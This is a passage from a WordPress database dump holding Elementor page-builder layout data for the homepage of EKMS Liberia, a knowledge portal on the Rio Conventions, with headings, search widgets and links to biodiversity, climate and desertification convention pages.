ttings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13185,2137,'_elementor_version','2.7.5'),(13186,2137,'_elementor_template_type','wp-page'),(13187,2137,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13190,2138,'_wp_page_template','default'),(13191,2138,'_elementor_edit_mode','builder'),(13192,2138,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(0,0,0,0.15)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}